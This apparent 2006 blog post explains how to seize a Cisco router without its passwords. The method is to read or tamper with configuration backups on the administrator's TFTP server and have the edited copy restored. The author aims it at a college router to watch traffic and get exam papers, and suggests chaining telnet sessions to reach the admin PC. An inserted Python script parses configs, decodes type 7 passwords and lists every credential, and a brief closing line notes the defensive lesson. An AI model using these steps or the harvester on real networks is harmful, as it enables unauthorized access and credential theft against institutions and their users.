Friday, February 24, 2006

Fundamental Router Hacking

I've been thinking about this. This should get you administrator access to a Cisco router without ever knowing its passwords in advance.

The deal here is that Cisco's routers let you back up the entire router configuration. This, effectively, means that you can copy the entire set of settings (including passwords, inter alia) onto a PC that is connected to the router, via the console port at the very least (the same commands work from an aux or vty session, as long as you are logged in). Anyway, this concept can be applied to hack into a Cisco router. I've thought about this for a while and it makes perfect logical sense. See, you need to be in Privileged EXEC mode (the "R1#" prompt, which is password protected via the enable password or enable secret) to be able to make changes to the router's configuration, or to copy it anywhere. Let's just imagine that I, Aseem, wish to access a hypothetical router kept in college (say R1).

Now that router has to be connected to a PC (say PC) which is used to configure it. (For the uninitiated, a router does not have a display or a keyboard; that is managed by the PC. If you wish for more details on this, let me know.) Anyway, what happens is that, almost always, a backup of the running IOS (Internetwork Operating System) image and of the configuration is taken as a precautionary measure. This can only be done by someone who has the required passwords for the router, which you don't, right now. In order to configure R1 we need to reach its Privileged EXEC mode, which we cannot, right now, since it is password protected. The router administrator can, however, make backups, change the configuration etc. by issuing the following command (copy startup-config tftp does the same for the saved configuration; very old IOS versions call this write network):

R1# copy running-config tftp

Address or name of remote host []? (IP address of the PC here)

Destination filename [r1-confg]? (name the file will have on the PC; the default is the hostname plus "-confg")

Once the backup of the configuration has been created (by the administrator, NOT you, since you are a normal user/intruder at this time), it is transferred to the PC, which is acting as a TFTP server, and lands in the TFTP server's root directory. Now the cool thing is that even though the IOS backup is useless to you (it is a binary image compiled for the router's own CPU, not a text file), the backup of the configuration CAN be read by simply opening it in WordPad or the like. Once you are through with this, you'll have the router's configuration in front of you. Two things matter here. First, the passwords are right there in the file: an "enable password" or any "password 7" line is stored with Cisco's reversible type 7 obfuscation, which anyone can decode in seconds, and lines without a type number are plain text; only an "enable secret" is a real salted hash that would need cracking. Second, TFTP has no authentication at all, so anyone who can reach the server's directory (or sniff the transfer, which goes over UDP in the clear) gets the same file. Change it, mess around with it or do whatever you want with it (add yourself a privilege 15 user, say), and save the changes. The next time the administrator restores from that backup (copy tftp running-config or copy tftp startup-config), the original configuration gets overwritten and your edited backup becomes the live config. You now have access to the entire router (along with the passwords et al).
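As an added example (my own illustration, not code from the original post), here is what the "open it in WordPad" step looks like when done properly with a script. It walks a small IOS configuration backup, pulls out every line that carries a credential, decodes the type 7 ones using Cisco's publicly known reversible scheme, and flags the enable secret as a hash that cannot be read off directly. The configuration text is constructed for this example (the hostname, users, the type 5 string, which is a placeholder and not a real hash, and the IP address are all made up); the two type 7 values 0822455D0A16 and 1511021F0725 are the well-known test vectors that both decode to "cisco".

```python
import re

# Fixed key behind Cisco's reversible "type 7" password obfuscation. It is public
# knowledge, which is exactly why a "password 7" line hides nothing from an attacker.
TYPE7_KEY = "dsfd;kfoA,.iyewrkldJKDHSUBsgvca69834ncxv"


def type7_decode(encoded: str) -> str:
    """Reverse a 'password 7' value: two decimal digits give the key offset, the rest
    is hex, one byte per character, each XORed with the key at (offset + position)."""
    if len(encoded) < 4 or len(encoded) % 2 != 0:
        raise ValueError("malformed type 7 string: %r" % encoded)
    offset = int(encoded[:2])
    body = bytes.fromhex(encoded[2:])
    return "".join(
        chr(b ^ ord(TYPE7_KEY[(offset + i) % len(TYPE7_KEY)])) for i, b in enumerate(body)
    )


def type7_encode(plain: str, offset: int = 8) -> str:
    """Forward direction, used to show the scheme round-trips with no secret involved."""
    out = "%02d" % offset
    for i, ch in enumerate(plain):
        out += "%02X" % (ord(ch) ^ ord(TYPE7_KEY[(offset + i) % len(TYPE7_KEY)]))
    return out


# Credential-bearing lines in a Cisco IOS config (global and per-line blocks).
ENABLE_RE = re.compile(r"^enable (secret|password)(?: (\d+))? (\S+)$")
USER_RE = re.compile(r"^username (\S+)(?: .*?)? (secret|password)(?: (\d+))? (\S+)$")
LINE_RE = re.compile(r"^line (\S.*)$")
LINEPW_RE = re.compile(r"^\s+password(?: (\d+))? (\S+)$")


def classify(kind, value):
    """Map the numeric password type to what an attacker can do with it."""
    if kind in (None, "0"):
        return "cleartext", value            # stored as typed
    if kind == "7":
        return "type7-decoded", type7_decode(value)  # reversible in seconds
    # 5 = MD5-crypt, 8 = PBKDF2-SHA256, 9 = scrypt: salted hashes, need offline cracking
    return "hashed-type%s" % kind, None


def harvest(config: str) -> list:
    """Walk a config backup line by line and return every credential it carries."""
    found = []
    context = "global"
    for raw in config.splitlines():
        line = raw.rstrip()
        if not line.startswith(" "):           # top-level line: enter or leave a 'line ...' block
            m = LINE_RE.match(line)
            context = "line " + m.group(1) if m else "global"
        m = ENABLE_RE.match(line)
        if m:
            scheme, secret = classify(m.group(2), m.group(3))
            found.append({"where": "enable " + m.group(1), "scheme": scheme, "secret": secret})
            continue
        m = USER_RE.match(line)
        if m:
            scheme, secret = classify(m.group(3), m.group(4))
            found.append({"where": "username " + m.group(1), "scheme": scheme, "secret": secret})
            continue
        m = LINEPW_RE.match(line)
        if m and context != "global":
            scheme, secret = classify(m.group(1), m.group(2))
            found.append({"where": context, "scheme": scheme, "secret": secret})
    return found


# Constructed sample backup, as a TFTP server might hold it after "copy running-config tftp".
# The type 5 string is a placeholder, not a genuine hash.
SAMPLE_CONFIG = """\
!
hostname R1
!
enable secret 5 $1$x1y2$placeholderhashvalue12345
enable password 7 0822455D0A16
!
username admin privilege 15 password 7 1511021F0725
username ops password 0 letmein
!
line con 0
 password 7 0307540515002D491F
 login
line vty 0 4
 password cisco123
 login
!
end
"""

if __name__ == "__main__":
    for cred in harvest(SAMPLE_CONFIG):
        print("%-16s %-14s %s" % (cred["where"], cred["scheme"], cred["secret"]))
```

Running it against the sample prints six entries: the enable secret comes back as a hash with nothing recovered, while the enable password, the admin user, the console line and the vty line give up "cisco", "cisco", "console1" and "cisco123" outright. The practical lesson for the administrator is the mirror image: only enable secret (or username ... secret) buys anything, and the TFTP directory that receives the backups has to be treated as if it held the passwords in clear, because it effectively does.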

Now if R1 were a router in college, then I could, in effect, have used the router to view traffic and possibly the sessional question papers etc. muahaha
One more thing: in case you do not have access to the PC connected to the router, you may reach that PC by first launching an RPC or telnet session on another PC, which in turn can be used to launch a further RPC/telnet session on the PC that is connected to the router.

Please do forgive me if you do not understand a part of this, or maybe everything in its entirety. I have not really delved into the behind-the-scenes workings and the terms used etc. Again, let me know if anything isn't clear and I shall try my best to elucidate that part.
This is, in all probability, the last, or at least one of the last, hacks that I shall be posting online. Anyway, enough of this.

